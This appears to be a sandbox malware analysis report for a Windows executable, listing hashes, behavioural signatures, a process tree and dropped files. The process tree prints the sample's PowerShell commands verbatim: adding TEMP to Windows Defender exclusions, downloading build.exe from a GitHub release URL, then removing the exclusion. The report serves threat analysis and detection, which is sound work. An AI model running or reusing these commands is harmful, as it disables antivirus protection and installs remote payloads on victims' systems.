Analysis
-
max time kernel
13s -
max time network
20s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
23/03/2025, 02:34
Behavioral task
behavioral1
Sample
568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
Resource
win10v2004-20250314-en
General
-
Target
568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
-
Size
57KB
-
MD5
16edd47bf01716b24958a0b3a3a7bcfb
-
SHA1
8b7972f4190c2ca9d600084611e966fa0f899b98
-
SHA256
568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
-
SHA512
9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1
-
SSDEEP
768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/
Malware Config
Signatures
-
pid Process 2960 powershell.exe 3036 powershell.exe -
resource yara_rule behavioral1/memory/2460-0-0x0000000140000000-0x0000000140028000-memory.dmp upx behavioral1/memory/2460-29-0x0000000140000000-0x0000000140028000-memory.dmp upx -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 2960 powershell.exe 2748 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2960 powershell.exe 3036 powershell.exe 2748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2960 powershell.exe Token: SeDebugPrivilege 3036 powershell.exe Token: SeDebugPrivilege 2748 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2460 wrote to memory of 2840 2460 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe 30 PID 2460 wrote to memory of 2840 2460 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe 30 PID 2460 wrote to memory of 2840 2460 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe 30 PID 2840 wrote to memory of 2860 2840 cmd.exe 31 PID 2840 wrote to memory of 2860 2840 cmd.exe 31 PID 2840 wrote to memory of 2860 2840 cmd.exe 31 PID 2860 wrote to memory of 2940 2860 net.exe 32 PID 2860 wrote to memory of 2940 2860 net.exe 32 PID 2860 wrote to memory of 2940 2860 net.exe 32 PID 2840 wrote to memory of 2960 2840 cmd.exe 33 PID 2840 wrote to memory of 2960 2840 cmd.exe 33 PID 2840 wrote to memory of 2960 2840 cmd.exe 33 PID 2840 wrote to memory of 3036 2840 cmd.exe 34 PID 2840 wrote to memory of 3036 2840 cmd.exe 34 PID 2840 wrote to memory of 3036 2840 cmd.exe 34 PID 2840 wrote to memory of 2748 2840 cmd.exe 35 PID 2840 wrote to memory of 2748 2840 cmd.exe 35 PID 2840 wrote to memory of 2748 2840 cmd.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EC81.tmp\EC91.tmp\EC92.bat C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:2940
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51c935ef28fdfd394b770d945d7f04d76
SHA129e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AXNG9EAC24HR6UTSJ3JV.temp
Filesize7KB
MD55717709e6a17b879373cd2411ce9245a
SHA1c90eba58597d20c849f3d456097e28572aa9f4d1
SHA256b7927b804f64446b76ff7e091128501068b1e1f816516dd73b41815274d95556
SHA512f2f0ecf41184063346e3d63ff9c297c43dea70950f58952246ed6bf384b5ae66f5eeb61cd423d8a5677aed20c13dd0bd4cbe7ea96904d4a2056a72b3759ea490